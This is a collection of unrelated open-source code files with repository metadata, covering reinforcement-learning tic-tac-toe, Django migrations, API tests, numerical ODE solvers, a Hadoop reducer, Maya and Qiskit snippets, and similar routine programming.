| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,173
|
py
|
from sklearn.neural_network import MLPClassifier
import numpy as np
import matplotlib.pyplot as plt
from tic_tac_toe.simple_tic_tac_toe import TicTacToe
def show_progress(batch_rewards, log, percentile, reward_range=[-990, +100]):
"""
A convenience function that displays training progress.
No cool math here, just charts.
"""
mean_reward, threshold = np.mean(batch_rewards), np.percentile(batch_rewards, percentile)
log.append([mean_reward, threshold])
print("mean reward = %.3f, threshold=%.3f" % (mean_reward, threshold))
plt.figure(figsize=[8, 4])
plt.subplot(1, 2, 1)
plt.plot(list(zip(*log))[0], label='Mean rewards')
plt.plot(list(zip(*log))[1], label='Reward thresholds')
plt.legend()
plt.grid()
plt.subplot(1, 2, 2)
plt.hist(batch_rewards, range=reward_range)
plt.vlines([np.percentile(batch_rewards, percentile)], [0], [100], label="percentile", color='red')
plt.legend()
plt.grid()
plt.show()
def select_elites(states_batch, actions_batch, rewards_batch, percentile=50):
"""
Select states and actions from games that have rewards >= percentile
:param states_batch: list of lists of states, states_batch[session_i][t]
:param actions_batch: list of lists of actions, actions_batch[session_i][t]
:param rewards_batch: list of rewards, rewards_batch[session_i][t]
:returns: elite_states,elite_actions, both 1D lists of states and respective actions from elite sessions
Please return elite states and actions in their original order
[i.e. sorted by session number and timestep within session]
If you're confused, see examples below. Please don't assume that states are integers (they'll get different later).
"""
reward_threshold = np.percentile(rewards_batch, percentile)
elite_states = [s for i in range(len(states_batch)) if rewards_batch[i] >= reward_threshold for s in
states_batch[i]]
elite_actions = [a for i in range(len(actions_batch)) if rewards_batch[i] >= reward_threshold for a in
actions_batch[i]]
return elite_states, elite_actions
def generate_session(t_max=1000):
states, actions = [], []
total_reward = 0
s = env.reset()
print("State-reset: ", s)
for t in range(t_max):
print("\nStep inside step - ", t)
# a vector of action probabilities in current state
probs = agent.predict_proba([s])[0]
print("Probs: ", probs)
a = np.random.choice(n_actions, 1, p=probs)[0]
print("Action:", a)
action = env.states
if action[a] == 1:
continue
new_s, r, done = env.step(a, 1)
# record sessions like you did before
states.append(s)
actions.append(a)
total_reward += r
s = new_s
print("new_state - ", new_s)
print("r = ", r)
if done:
break
return states, actions, total_reward
env = TicTacToe()
env.reset()
n_actions = env.n
print("Actions: \n", env.actions)
print("Total number of actions: ", n_actions)
agent = MLPClassifier(hidden_layer_sizes=(20, 20),
activation='tanh',
warm_start=True,
max_iter=1 #make only 1 iteration on each .fit(...)
)
# initialize agent to the dimension of state an amount of actions
print([env.reset()]*n_actions)
agent.fit([env.reset()]*n_actions, range(n_actions))
n_sessions = 100
percentile = 70
log = []
for i in range(50):
print('\n\n\n !!! STEP - ', i+1)
# generate new sessions
sessions = [generate_session() for i in range(n_sessions)]
batch_states, batch_actions, batch_rewards = map(np.array, zip(*sessions))
elite_states, elite_actions = select_elites(batch_states, batch_actions, batch_rewards, percentile)
# print(elite_states[:3])
# print(elite_actions[:3])
agent.fit(elite_states, elite_actions)
show_progress(batch_rewards, log, percentile, reward_range=[0, np.max(batch_rewards)])
if np.mean(batch_rewards) > 50:
print("You Win! You may stop training now via KeyboardInterrupt.")
|
[
"Ollitros@gmail.com"
] |
Ollitros@gmail.com
|
2f13a478783bf8420e554f05869dea7277b04405
|
44fc88370e7dd01aab918aa797983c5051f4147e
|
/Controllers/TestThread.py
|
eb4dc07460106b86c8a16d0ffce941059358f7c6
|
[] |
no_license
|
Sispheor/PiHomeAlone
|
1f1a9aa619b97483a61972b58094c6cec961161a
|
7356adddc0e936b8c8f6bd45813ec012196edefd
|
refs/heads/master
| 2021-01-15T16:57:20.813213
| 2016-08-31T20:14:02
| 2016-08-31T20:14:02
| 64,602,755
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 369
|
py
|
import threading
class TestThread(threading.Thread):
def __init__(self, shared_queue):
super(TestThread, self).__init__()
self.shared_queue = shared_queue
def run(self):
print "Run test thread"
while True:
if not self.shared_queue.empty():
val = self.shared_queue.get()
print val
|
[
"nico.marcq@gmail.com"
] |
nico.marcq@gmail.com
|
a3e1e62573d08a5efcf9b3c114322ce3211071fb
|
4e23ff457c737886d3f1280162b90987bbc12211
|
/main/apps/carts/migrations/0003_auto_20190120_0337.py
|
bd278830f6b8cdc994bdb5beb3c617c35c70510e
|
[] |
no_license
|
ehoversten/Ecommerce_Django
|
8ab1edeb1b7ed2a0e9f33920ecccc2d6b1996cd9
|
b109b62e2fd318c4feb37c448898cbeada722968
|
refs/heads/master
| 2022-12-21T09:42:53.317891
| 2019-02-14T16:24:00
| 2019-02-14T16:24:00
| 143,313,907
| 6
| 2
| null | 2022-11-22T02:34:42
| 2018-08-02T15:34:32
|
Python
|
UTF-8
|
Python
| false
| false
| 660
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2019-01-20 03:37
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('carts', '0002_cart_subtotal'),
]
operations = [
migrations.AlterField(
model_name='cart',
name='subtotal',
field=models.DecimalField(decimal_places=2, default=0.0, max_digits=10),
),
migrations.AlterField(
model_name='cart',
name='total',
field=models.DecimalField(decimal_places=2, default=0.0, max_digits=10),
),
]
|
[
"ehoversten@gmail.com"
] |
ehoversten@gmail.com
|
c40022197521b3fda780acbc6aeb293021154248
|
fa1eb33b885bd03a56a542720c4f823654457bd5
|
/tests/test_image_search.py
|
b4169a9b82cd7fb74be11c9f5050def5e6b7800c
|
[] |
no_license
|
jhoover4/fcc-api-projects
|
16753435017518c0594db9ead3606691280fadc4
|
b21f830c0f1047e0cb28f71387de4581cd4be523
|
refs/heads/master
| 2022-12-11T03:44:22.103645
| 2018-12-26T19:24:13
| 2018-12-26T19:25:52
| 118,831,587
| 0
| 0
| null | 2022-12-08T01:26:31
| 2018-01-24T22:44:09
|
Python
|
UTF-8
|
Python
| false
| false
| 2,433
|
py
|
import datetime
import json
import unittest
from test_app import BaseTestCase
import models
class TestImageSearchView(BaseTestCase, unittest.TestCase):
def test_check_table(self):
assert models.ImageSearch.table_exists()
def test_index(self):
"""Test that the description view for this api is running."""
url = self.app.get('/image-search')
self.assertTrue(url.data)
self.assertEqual(url.status_code, 200)
class TestImageSearchApi(BaseTestCase, unittest.TestCase):
def setUp(self):
super().setUp()
self.search_record = models.ImageSearch.create(search_query='cats')
def test_new_search(self):
"""Test search is performed correctly and returns json data."""
response = self.app.get('/api/image-search/cats')
self.assertEqual(response.status_code, 200)
self.assertTrue(response.json[0]['displayLink'])
def test_new_search_offset(self):
"""Test search is performed correctly with offset parameter"""
response = self.app.get('/api/image-search/cats')
offset_response = self.app.get('/api/image-search/cats', query_string={'offset': 15})
self.assertEqual(offset_response.status_code, 200)
self.assertNotEqual(offset_response.json[0]['formattedUrl'], response.json[0]['formattedUrl'])
def test_new_query_in_args(self):
"""Test search is performed with query in parameters."""
response = self.app.get('/api/image-search', query_string={'query': 'cats'})
self.assertEqual(response.status_code, 200)
self.assertTrue(response.json[0]['displayLink'])
def test_new_query_in_args_empty(self):
"""Test error is thrown if query not in url at all."""
response = self.app.get('/api/image-search')
self.assertEqual(response.status_code, 400)
self.assertEqual(json.loads(response.data), {
'message': 'Query is required.'
})
def test_recent_searches(self):
"""Test all searches are returned on GET."""
response = self.app.get('/api/image-search/recent')
expected_data = [{
'query': self.search_record.search_query,
'when': datetime.datetime.strftime(self.search_record.created_at, '%a, %d %b %Y %X -0000')
}]
self.assertEqual(response.status_code, 200)
self.assertEqual(json.loads(response.data), expected_data)
|
[
"jordan@hoovermld.com"
] |
jordan@hoovermld.com
|
c253640dbc26eb41517006f2f80be5e9f19b2aaf
|
2e9748e6dc278a5a84184216d94ab2c841ec8482
|
/image_process/opencv/noise_remove_inpaint/main.py
|
17a39c66a3aa56f6b191aaa81377d6ade7690a95
|
[
"MIT"
] |
permissive
|
ybdesire/machinelearning
|
fa2bc20240e88513475358c761d067108e1eadf8
|
0224746332e1085336e0b02e0ca3b11d74bd9a91
|
refs/heads/master
| 2021-12-08T04:46:56.344543
| 2021-11-19T07:57:47
| 2021-11-19T07:57:47
| 54,877,464
| 30
| 19
| null | 2021-08-13T01:23:08
| 2016-03-28T08:16:06
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 208
|
py
|
import numpy as np
import cv2 as cv
img = cv.imread('messi.png')
mask = cv.imread('mask.png',0)
dst = cv.inpaint(img,mask,3,cv.INPAINT_TELEA)
cv.imshow('dst',dst)
cv.waitKey(0)
cv.destroyAllWindows()
|
[
"ybdesire@gmail.com"
] |
ybdesire@gmail.com
|
129f9191f2f84ac88110b03e3dcf1e00a852b049
|
3c92c3f633b613a62fb67476fd617e1140133880
|
/leetcode/605. Can Place Flowers.py
|
db797a8c9e9dcebc16f5082e85a622b0163ba516
|
[] |
no_license
|
cuiy0006/Algorithms
|
2787f36f8164ded5252a006f723b570c9091bee9
|
00fd1397b65c68a303fcf963db3e28cd35c1c003
|
refs/heads/master
| 2023-03-31T13:55:59.191857
| 2023-03-31T03:39:42
| 2023-03-31T03:39:42
| 75,001,651
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 486
|
py
|
class Solution:
def canPlaceFlowers(self, flowerbed: List[int], n: int) -> bool:
if n == 0:
return True
for i, plot in enumerate(flowerbed):
if plot == 1:
continue
if (i == 0 or flowerbed[i - 1] == 0) and (i == len(flowerbed) - 1 or flowerbed[i + 1] == 0):
flowerbed[i] = 1
n -= 1
if n == 0:
return True
return False
|
[
"noreply@github.com"
] |
cuiy0006.noreply@github.com
|
f68d2ca23b8e9660445df4f664adf81a10a1b580
|
dd6a3615d54ca825051f1c9f81bcd206eb9cfd10
|
/setup.py
|
91bcc6ec95068bd0fb034196004e350c1d121a19
|
[
"MIT"
] |
permissive
|
cherakhan/mps
|
82e06aea229b2047bf1be68c4430fad621189abf
|
2ba818c361e467841f6bbe0ef47a1e833ef315d3
|
refs/heads/master
| 2022-02-01T20:40:07.327357
| 2019-06-10T03:43:49
| 2019-06-10T03:43:49
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,162
|
py
|
#!/usr/bin/env python
import os
from setuptools import find_packages
with open('README.md', 'r') as f:
LONG_DESCRIPTION = f.read()
from numpy.distutils.core import setup, Extension
setup_options = dict(
name='doe-mps',
version="0.1.1",
long_description=LONG_DESCRIPTION,
long_description_content_type="text/markdown",
url='https://github.com/kirthevasank/mps/',
license='MIT',
author_email='kandasamy@cs.cmu.edu',
packages=['mps', 'mps.exd', 'mps.policies', 'mps.utils', 'mps.prob'],
install_requires=[
'future',
'numpy',
'scipy',
'six',
],
classifiers=[
"Intended Audience :: Developers",
"Intended Audience :: Education",
"Intended Audience :: Science/Research",
"License :: OSI Approved :: MIT License",
"Operating System :: MacOS",
"Operating System :: Microsoft :: Windows",
"Operating System :: POSIX :: Linux",
"Operating System :: Unix",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 3",
"Topic :: Scientific/Engineering :: Artificial Intelligence",
],
)
setup(**setup_options)
|
[
"kandasamy@cs.cmu.edu"
] |
kandasamy@cs.cmu.edu
|
d2fb24dfd527c8ee0ac66cd54930611e44b3d5c6
|
34652a47355a8dbe9200db229a1bbc62619de364
|
/Maths/diff_eqns/Runge_Kutta_method_2.py
|
98e189db514dbf1126d73f217e5d7515b190d817
|
[] |
no_license
|
btrif/Python_dev_repo
|
df34ab7066eab662a5c11467d390e067ab5bf0f8
|
b4c81010a1476721cabc2621b17d92fead9314b4
|
refs/heads/master
| 2020-04-02T13:34:11.655162
| 2019-11-10T11:08:23
| 2019-11-10T11:08:23
| 154,487,015
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,722
|
py
|
def rKN(x, fx, n, hs):
k1 = []
k2 = []
k3 = []
k4 = []
xk = []
for i in range(n):
k1.append(fx[i](x)*hs)
for i in range(n):
xk.append(x[i] + k1[i]*0.5)
for i in range(n):
k2.append(fx[i](xk)*hs)
for i in range(n):
xk[i] = x[i] + k2[i]*0.5
for i in range(n):
k3.append(fx[i](xk)*hs)
for i in range(n):
xk[i] = x[i] + k3[i]
for i in range(n):
k4.append(fx[i](xk)*hs)
for i in range(n):
x[i] = x[i] + (k1[i] + 2*(k2[i] + k3[i]) + k4[i])/6
return x
def fa1(x):
return 0.9*(1 - x[1]*x[1])*x[0] - x[1] + math.sin(x[2])
def fb1(x):
return x[0]
def fc1(x):
return 0.5
def VDP1():
f = [fa1, fb1, fc1]
x = [1, 1, 0]
hs = 0.05
for i in range(20000):
x = rKN(x, f, 3, hs)
def rK3(a, b, c, fa, fb, fc, hs):
a1 = fa(a, b, c)*hs
b1 = fb(a, b, c)*hs
c1 = fc(a, b, c)*hs
ak = a + a1*0.5
bk = b + b1*0.5
ck = c + c1*0.5
a2 = fa(ak, bk, ck)*hs
b2 = fb(ak, bk, ck)*hs
c2 = fc(ak, bk, ck)*hs
ak = a + a2*0.5
bk = b + b2*0.5
ck = c + c2*0.5
a3 = fa(ak, bk, ck)*hs
b3 = fb(ak, bk, ck)*hs
c3 = fc(ak, bk, ck)*hs
ak = a + a3
bk = b + b3
ck = c + c3
a4 = fa(ak, bk, ck)*hs
b4 = fb(ak, bk, ck)*hs
c4 = fc(ak, bk, ck)*hs
a = a + (a1 + 2*(a2 + a3) + a4)/6
b = b + (b1 + 2*(b2 + b3) + b4)/6
c = c + (c1 + 2*(c2 + c3) + c4)/6
return a, b, c
def fa2(a, b, c):
return 0.9*(1 - b*b)*a - b + math.sin(c)
def fb2(a, b, c):
return a
def fc2(a, b, c):
return 0.5
def VDP2():
a, b, c, hs = 1, 1, 0, 0.05
for i in range(20000):
a, b, c = rK3(a, b, c, fa2, fb2, fc2, hs)
|
[
"bogdan.evanzo@gmail.com"
] |
bogdan.evanzo@gmail.com
|
ce033b921042d603ac116dcbe76a4c8e40f95ad7
|
a227947112fe8a3fd8078bcdfee22b82385f5490
|
/aat/config/enums.py
|
25fa292208b39967d8415ad9fd63dbece71a9fc3
|
[
"Apache-2.0"
] |
permissive
|
Sahanduiuc/aat-1
|
43465f6060d084a5442af8685266e0cd009a8626
|
0aee0f9943b5e16f29ec69faea5f9e5a937c5e5d
|
refs/heads/master
| 2022-11-15T21:16:28.580803
| 2020-06-14T22:14:37
| 2020-06-14T22:14:37
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,036
|
py
|
from enum import Enum
class BaseEnum(Enum):
def __str__(self):
return f'{self.value}'
class Side(BaseEnum):
BUY = 'BUY'
SELL = 'SELL'
class EventType(BaseEnum):
# Trade events
TRADE = 'TRADE'
# Order events
OPEN = 'OPEN'
CANCEL = 'CANCEL'
CHANGE = 'CHANGE'
FILL = 'FILL'
# Other data events
DATA = 'DATA'
# System events
HALT = 'HALT'
CONTINUE = 'CONTINUE'
# Engine events
ERROR = 'ERROR'
START = 'START'
EXIT = 'EXIT'
class DataType(BaseEnum):
ORDER = 'ORDER'
TRADE = 'TRADE'
class InstrumentType(BaseEnum):
CURRENCY = 'CURRENCY'
# PAIR = 'PAIR'
EQUITY = 'EQUITY'
# BOND = 'BOND'
# OPTION = 'OPTION'
# FUTURE = 'FUTURE'
class OrderType(BaseEnum):
# Order Types
LIMIT = 'LIMIT'
MARKET = 'MARKET'
STOP = 'STOP'
class OrderFlag(BaseEnum):
# Order Flag
NONE = 'NONE'
FILL_OR_KILL = 'FILL_OR_KILL'
ALL_OR_NONE = 'ALL_OR_NONE'
IMMEDIATE_OR_CANCEL = 'IMMEDIATE_OR_CANCEL'
|
[
"t.paine154@gmail.com"
] |
t.paine154@gmail.com
|
9b58eff7ed3daf3e244f4bf1236dffbbb10d87fc
|
a222e2999251ba7f0d62c428ba8cc170b6d0b3b7
|
/AtC_Beg_Con_111-120/ABC111/B-AtCoder_Beginner_Contest_111.py
|
81b7210ed85e1fae5ea424f1edba455792a672aa
|
[
"MIT"
] |
permissive
|
yosho-18/AtCoder
|
3e1f3070c5eb44f154c8104fbd5449f47446ce14
|
50f6d5c92a01792552c31ac912ce1cd557b06fb0
|
refs/heads/master
| 2020-06-02T10:21:29.458365
| 2020-05-29T12:40:48
| 2020-05-29T12:40:48
| 188,795,239
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 365
|
py
|
n = int(input())
if n <= 111:
print(111)
if n > 111 and n <= 222:
print(222)
if n > 222 and n <= 333:
print(333)
if n > 333 and n <= 444:
print(444)
if n > 444 and n <= 555:
print(555)
if n > 555 and n <= 666:
print(666)
if n > 666 and n <= 777:
print(777)
if n > 777 and n <= 888:
print(888)
if n > 888 and n <= 999:
print(999)
|
[
"44283410+wato18@users.noreply.github.com"
] |
44283410+wato18@users.noreply.github.com
|
7ea4bcf5409fe244dc0f83e9747b2ac105b38bb1
|
1b05b6f4d96a14ba2beea7ff43bdaae124bbe41b
|
/Gdt/algorithm/algorithm/dxregulation.py
|
f4f402d65a63ddd6ec0dcb3c4fc66b74c731761b
|
[] |
no_license
|
shmilyrj126/NetWork
|
27fcbde777c6ee25abfdd09a381c1a7a743d742a
|
957f0679f01d2a09d217516518ddd9693c0b2a80
|
refs/heads/master
| 2022-12-13T00:19:04.208089
| 2020-09-17T12:59:29
| 2020-09-17T12:59:29
| 296,340,198
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 474
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Fri Nov 22 09:11:21 2019
@author: hsc
"""
import numpy as np
import pandas as pd #导入pandas包
data1= pd.read_csv("C:\\Users\\hsc\\Desktop\\w4.csv")
data2= pd.read_csv("C:\\Users\\hsc\\Desktop\\w5.csv")
print(data1)
print(data2)
n=len(data1)
data3=DataFrame(columns== ["N", "1", "2", "3"])
for i in n :
if data1["V1"]=data2["N1"]:
data3["N"]=data2.index
|
[
"noreply@gitee.com"
] |
noreply@gitee.com
|
a5cbd4174a07e88112f6ff2349b897cace44db22
|
581c041a0a32f051508f3b0a167656cb6169c2fe
|
/project_management/notifications/.svn/text-base/urls.py.svn-base
|
86d4d6a3ade25ed394867f009ed21fd231ac89d5
|
[] |
no_license
|
raveena17/ILASM
|
da38258b6739e823b973c2bede2a21dd04e0941e
|
7a337e0e3a20180b9564de68ab22620dc9aa1a36
|
refs/heads/master
| 2022-12-05T14:34:45.929663
| 2019-06-25T14:18:47
| 2019-06-25T14:18:47
| 193,101,540
| 0
| 0
| null | 2022-12-03T15:11:35
| 2019-06-21T13:20:47
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 325
|
"""
urls for event application
"""
from django.conf.urls.defaults import patterns
urlpatterns = patterns('project_management.notifications',
(r'^create/$', 'views.manage_event'),
(r'^update/(?P<id>\d+)/$', 'views.manage_event'),
(r'^list/$', 'views.event_list'),
(r'^delete/$', 'views.delete_event'),
)
|
[
"raveena@5gindia.net"
] |
raveena@5gindia.net
|
|
76a97aedfd25a25ec5052821f9d86f5d50382bcd
|
aa0366a8632f334fb35e6bdc78717f3456202eb7
|
/old/bdApiGetCom_v02.py
|
676422673aa737b8010d9f1ed60f43dc04226cfb
|
[] |
no_license
|
Mortaciunea/bdScripts
|
0891478096f3a5876655896c9649c0a7204d5ee8
|
4f6e9d2b181bb4a90c1ccfcaca64c22ecbe0dd59
|
refs/heads/master
| 2020-12-24T13:36:57.930038
| 2015-09-03T16:03:46
| 2015-09-03T16:03:46
| 41,869,547
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,026
|
py
|
import maya.cmds as cmds
import maya.OpenMaya as om
def bdGetCentroid(vectorArray):
center = ((vectorArray[0] - pointInsideVec) + (vectorArray[1] - pointInsideVec) + (vectorArray[2] - pointInsideVec))/4
return center
def bdGetComMain():
mDagObject = om.MDagPath()
mSelList = om.MSelectionList()
mDagPointInside = om.MDagPath()
mSelList.add('pointInsideLoc')
mSelList.getDagPath(0,mDagPointInside)
#mDagPointInside.pop()
mTransformPointInside = om.MFnTransform(mDagPointInside)
mPointInsideVector = mTransformPointInside.getTranslation(om.MSpace.kWorld)
print mDagPointInside.fullPathName()
om.MGlobal.getActiveSelectionList(mSelList)
numSel = mSelList.length()
if numSel == 1:
mSelList.getDagPath(0,mDagObject)
#print mDagObject.fullPathName()
if mDagObject.hasFn(om.MFn.kMesh):
mFnMesh = om.MFnMesh(mDagObject)
volumes = om.MFloatArray()
centers = om.MVectorArray()
for i in range(mFnMesh.numPolygons()):
mVertsId = om.MIntArray()
mFnMesh.getPolygonVertices(i,mVertsId)
mVertPosArray = om.MVectorArray()
for vert in mVertsId:
mVertPos = om.MPoint()
mFnMesh.getPoint(vert,mVertPos)
mPointVector = om.MVector(mVertPos)
mVertPosArray.append(mPointVector)
volumes.append(bdCalculateVolume(mVertPosArray,mPointInsideVector))
centers.append(bdCalculateCenter(mVertPosArray,mPointInsideVector))
totalVolume = 0
for vol in volumes:
totalVolume +=vol
print 'Total Volume :', totalVolume
centerMass = om.MVector()
for i in range(mFnMesh.numPolygons()):
centerMass += centers[i]*volumes[i]
centerMass = centerMass / totalVolume
print centerMass.x, centerMass.y,centerMass.z
mSelList.add('comLoc')
mComLoc = om.MDagPath()
mSelList.getDagPath(1,mComLoc)
mTransformComLoc = om.MFnTransform(mComLoc)
print mComLoc.fullPathName()
mTransformComLoc.translateBy(centerMass,om.MSpace.kWorld)
bdGetComMain()
|
[
"ender_bd@yahoo.com"
] |
ender_bd@yahoo.com
|
550be29c5bc9d3a289d807df0b4515fa7991f024
|
196cd24f0dcd927779a42a39a5395baa3e3ad9dc
|
/groups/migrations/0004_auto_20200726_1934.py
|
0379bc6dc5af9c21d553711693e9195ceabf0c65
|
[
"MIT"
] |
permissive
|
Hedera-Lang-Learn/hedera
|
d38ac067ebcfa774eb8a916e20144d5e2a079c57
|
f44773bcf7695f4f73f0cd71daed7767902bcfd4
|
refs/heads/dev
| 2023-06-23T01:41:02.429563
| 2023-06-13T20:17:24
| 2023-06-13T20:17:24
| 154,722,012
| 9
| 3
|
MIT
| 2023-06-13T20:17:25
| 2018-10-25T18:53:59
|
Python
|
UTF-8
|
Python
| false
| false
| 844
|
py
|
# Generated by Django 2.2.13 on 2020-07-26 19:34
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('groups', '0003_auto_20200603_1933'),
]
operations = [
migrations.AddField(
model_name='group',
name='created_at',
field=models.DateTimeField(default=django.utils.timezone.now),
),
migrations.AddField(
model_name='group',
name='created_by',
field=models.ForeignKey(default=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='created_classes', to=settings.AUTH_USER_MODEL),
),
]
|
[
"paltman@gmail.com"
] |
paltman@gmail.com
|
da278ac32c41ed3843c40753b8dcdc5c5ea6c64f
|
272a078b59a1a780ab7cccf4e2741fcd447ca37c
|
/examples/streaming/wordCount/reducer.py
|
39ec1edf7accec778833f3e52b165c3600a8bfbd
|
[] |
no_license
|
casunlight/hadoop-tutorial
|
12dd2594b0990ad452bee01de0a2b6ceabe92501
|
6d45091fc92d39fe495f3f1a69acc493e2fe0c60
|
refs/heads/master
| 2020-03-26T22:11:56.028574
| 2018-11-26T00:20:41
| 2018-11-26T00:20:41
| 145,439,797
| 2
| 2
| null | 2018-09-11T18:26:26
| 2018-08-20T15:59:39
|
Shell
|
UTF-8
|
Python
| false
| false
| 1,076
|
py
|
#!/usr/bin/python
from __future__ import print_function
import sys
#variable initialization
current_word = None
current_count = 0
word = None
# takes input stdin
for line in sys.stdin:
# trim any leading and trailing spaces
line = line.strip()
# split the input from mapper.py and take the word and its count
word, count = line.split('\t', 1)
# convert count string to int
try:
count = int(count)
except ValueError:
# in case of exception
# ignore the exception and discard the input line
continue
# this IF-switch only works because Hadoop sorts map output
# by key (here: word) before it is passed to the reducer
if current_word == word:
current_count += count
else:
if current_word:
# write result to STDOUT
print('{}\t{}'.format(current_word, current_count))
current_count = count
current_word = word
# do not forget to output the last word if needed!
if current_word == word:
print('{}\t{}'.format(current_word, current_count))
|
[
"yanshu.usc@gmail.com"
] |
yanshu.usc@gmail.com
|
8706dd9534d6b4516529a80ef067267221875e06
|
aca65ed6f3c7e347adb9923fa78da77497624930
|
/ex11.py
|
03b2cc71ce6a496f5d1cdcbe77ee9e375f4c850b
|
[] |
no_license
|
bunnybryna/Learn_Python_The_Hard_Way
|
516bb76ced2569ea27d9ce50c5d5bc00eeb5740d
|
c4aeece3b819a228acb2fb77f29551a8683331c4
|
refs/heads/master
| 2021-01-11T18:04:41.477498
| 2017-01-23T17:42:28
| 2017-01-23T17:42:28
| 79,486,036
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 287
|
py
|
print "How old are you? (year)",
age = raw_input()
print "How tall are you? (centimeter)",
height = raw_input()
print "How much do you weigh? (kilogram)",
weight = raw_input()
print "So ,you're %s years old, %s centimeters tall and %s kilograms heavy." % (
age, height, weight)
|
[
"brynazhao@gmail.com"
] |
brynazhao@gmail.com
|
79fecc2c9c41f461be00ccb461bdb9cef9e811f3
|
6bb45c5892b4c9692dcc44116fb73dc9e7ab90ff
|
/advanced_functionality/scikit_learn_bring_your_own_model/code/inference.py
|
586143a9c2d8e619fe940d1c6006ddefc83d208a
|
[
"Apache-2.0",
"BSD-2-Clause"
] |
permissive
|
aws/amazon-sagemaker-examples
|
8359afe544e873662bda5b8d2b07399c437213c9
|
43dae4b28531cde167598f104f582168b0a4141f
|
refs/heads/main
| 2023-08-26T04:42:52.342776
| 2023-08-25T14:37:19
| 2023-08-25T14:37:19
| 107,937,815
| 4,797
| 3,519
|
Apache-2.0
| 2023-09-14T19:47:03
| 2017-10-23T05:55:22
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 487
|
py
|
import os
import joblib
def predict_fn(input_object, model):
###########################################
# Do your custom preprocessing logic here #
###########################################
print("calling model")
predictions = model.predict(input_object)
return predictions
def model_fn(model_dir):
print("loading model.joblib from: {}".format(model_dir))
loaded_model = joblib.load(os.path.join(model_dir, "model.joblib"))
return loaded_model
|
[
"noreply@github.com"
] |
aws.noreply@github.com
|
c1064e3cb0f46ad7adf774bda864f9f66f8de8ed
|
9beb6276f17e5d174b7827ee73974d65bf302c60
|
/scrumate/core/migrations/0009_auto_20190520_2336.py
|
6272f5158163f4f19adf7687aa847632d70b4dee
|
[
"MIT"
] |
permissive
|
nahidsaikat/scrumate
|
8a3bec242b5b6ff02f1a5b8309e777f154e7c338
|
11a63f1cc361261a7023eceafc2a27e29561dca0
|
refs/heads/master
| 2022-01-11T09:20:58.599693
| 2019-07-10T16:57:56
| 2019-07-10T16:57:56
| 169,908,944
| 1
| 0
|
MIT
| 2019-06-02T04:21:56
| 2019-02-09T20:12:45
|
HTML
|
UTF-8
|
Python
| false
| false
| 477
|
py
|
# Generated by Django 2.2.1 on 2019-05-20 23:36
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('core', '0008_auto_20190519_1902'),
]
operations = [
migrations.AlterField(
model_name='projectmember',
name='user',
field=models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='people.Employee'),
),
]
|
[
"nahidsaikatft40@gmail.com"
] |
nahidsaikatft40@gmail.com
|
92b8fbf42cdd9d76c411d6d3cdb66b67393a07a1
|
02024d0d05428da2a1b53862e31fe5bf0d667ba3
|
/qiskit/qasm/_node/_indexedid.py
|
fc87aadf35a174a409d35e133d3f3e49acc07abc
|
[
"Apache-2.0"
] |
permissive
|
nonhermitian/arrogant_seahorse
|
488dd22a200f45f068821ce93422d92dd6bae38c
|
2be1ff60857c75fcbbb0c23aa594f41e1a33c89c
|
refs/heads/master
| 2020-03-12T01:02:59.369571
| 2018-08-08T17:55:13
| 2018-08-08T17:55:13
| 130,365,670
| 0
| 0
|
Apache-2.0
| 2018-05-24T13:43:13
| 2018-04-20T13:26:27
|
Python
|
UTF-8
|
Python
| false
| false
| 1,565
|
py
|
# -*- coding: utf-8 -*-
# pylint: disable=invalid-name
# Copyright 2017 IBM RESEARCH. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
"""
Node for an OPENQASM indexed id.
"""
from ._node import Node
class IndexedId(Node):
"""Node for an OPENQASM indexed id.
children[0] is an id node.
children[1] is an Int node.
"""
def __init__(self, children):
"""Create the indexed id node."""
Node.__init__(self, 'indexed_id', children, None)
self.id = children[0]
self.name = self.id.name
self.line = self.id.line
self.file = self.id.file
self.index = children[1].value
def to_string(self, indent):
"""Print with indent."""
ind = indent * ' '
print(ind, 'indexed_id', self.name, self.index)
def qasm(self, prec=15):
"""Return the corresponding OPENQASM string."""
# pylint: disable=unused-argument
return self.name + "[%d]" % self.index
|
[
"nonhermitian@gmail.com"
] |
nonhermitian@gmail.com
|
b98564429effdf73626a3ffe5b14362282c0ce78
|
d5f75adf5603927396bdecf3e4afae292143ddf9
|
/python/paddle/fluid/tests/unittests/distributed_passes/test_dist_fuse_adam_pass.py
|
85c3bf321a3b1b100f593ba527698605a85570af
|
[
"Apache-2.0"
] |
permissive
|
jiweibo/Paddle
|
8faaaa1ff0beaf97ef7fb367f6c9fcc065f42fc4
|
605a2f0052e0ffb2fab3a4cf4f3bf1965aa7eb74
|
refs/heads/develop
| 2023-07-21T03:36:05.367977
| 2022-06-24T02:31:11
| 2022-06-24T02:31:11
| 196,316,126
| 3
| 2
